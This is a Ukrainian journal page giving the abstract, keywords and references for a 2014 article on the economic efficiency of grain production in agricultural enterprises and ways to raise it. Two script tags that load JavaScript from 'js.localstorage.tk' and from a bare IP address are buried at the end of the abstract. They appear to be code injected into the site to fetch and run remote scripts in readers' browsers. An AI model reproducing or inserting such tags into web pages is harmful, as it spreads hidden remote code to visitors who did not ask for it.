ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.436.33
Аграрний менеджмент і підприємництво

Економічна ефективність виробництва зерна та шляхи її підвищення в сільськогосподарських підприємствах / // Економіка АПК. - 2014. - № 3 - С. 55

Досліджено загальні тенденції виробництва і реалізації зерна в Україні та фактори, що впливають на економічну ефективність виробництва зерна в сільськогосподарських підприємствах. Визначено, що основними факторами, які позитивно впливають на економічну ефективність виробництва зерна, є розширення площі посіву, тобто концентрація та підвищення врожайності. Проведене дослідження дало змогу встановити, що нові технології підвищення врожайності можуть внести суттєві зміни у зростання ефективності виробництва зернових та на цій основі підвищити ефективність аграрного виробництва. Також у статті визначено чинники, що сприяють підвищенню ефективності виробництва, серед яких необхідно виділити удосконалення роботи з маркетинговими каналами збуту, проведення змін в державному регулюванні на зерновому ринку, а саме удосконалення цілей та методів державного регулювання зернового ринку, поліпшення аналізу ринку зерна та надання інформаційних послуг операторам ринку. Доведено, що підвищення врожайності зернових культур у районі та області можна досягти, використовуючи резерви виробництва, пов’язані з інтенсифікацією галузі. Табл.: 5. Рис.: 2. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: зерно, ефективність виробництва, реалізація зерна, сільськогосподарські підприємства, урожайність, зернові культури

Список використаних джерел

 1. Андрійчук В.Г. Ефективність діяльності аграрних підприємств: теорія, методика, аналіз / В.Г. Андрійчук – К.: КНЕУ, 2005. – 292 с.
 2. Витрати на ефективність виробництва продукції в сільськогосподарських підприємствах (моніторинг) / [Шпичак О.М., Воскобійник Ю.П., Шпикуляк О.Г. та ін.]; за ред. Ю.П. Воскобійника. – К. : ННЦ ІАЕ, 2013. – 440 с.
 3. Кучер С.В. Фактори впливу на стан ефективності зернового господарства в Україні С.В. Кучер // Економіка АПК. – 2004. – №1. – С. 114-118.
 4. Малік М.Й. Інституціоналізація аграрного підприємництва: трансформація та ефективність / М.Й. Малік, О.Г. Шпикуляк // Економіка АПК. – 2010. - № 7. – С. 132–139.
 5. Мочерний С.В. Економічна теорія: Підручник / С.В. Мочерний, М.В. Довбенко. – К.: Видавничий центр “Академія”, 2004. – 856 с.
 6. Основні економічні показники роботи сільськогосподарських підприємств Тальнівського району Черкаської області за 2007-2012 рр. Форма № 50-сг (річна). Управління агропромислового розвитку Тальнівської РДА Черкаської області.
 7. Офіційний сайт Держслужби статистики України [Електронний ресурс]: Статистична інформація. – Режим доступу: www.ukrstat.gov.ua.
 8. Розвиток і регулювання ринків сільськогосподарської продукції та продовольства [Текст] : матеріали 5-ї міжнар. наук. - практ. конф. молод. вчен. (у заоч. формі) / Нац. акад. аграр. наук України, ННЦ "Ін-т аграр. економіки" ; редкол. : Ю. О. Лупенко, В. М. Жук, М. Й. Малік [та ін.]. – К. : ННЦ "ІАЕ" , 2013. - 224 с.
 9. Статистичний збірник „Сільське господарство Черкащини” за 2012 рік / за ред. Л.М. Безхлібняк. – Черкаси: Головне управління статистики у Черкаській області Державної служби статистики України, 2013. – 374 с.
 10. Стратегічні напрями розвитку сільського господарства України на період до 2020 року [Текст] / [за ред. Ю. О. Лупенка, В. Я. Месель-Веселяка] ; Нац. акад. аграр. наук України, Нац. наук. центр "Ін-т аграр. економіки". – К. : ННЦ "ІАЕ", 2012. - 180 с. 
 11. Чмирь С. М. Напрямки підвищення ефективності зерновиробництва / С.М. Чмирь // Економіка АПК. – 2007. – №8. – С. 21-24.
Читати статтю: 14_03_55-61.pdf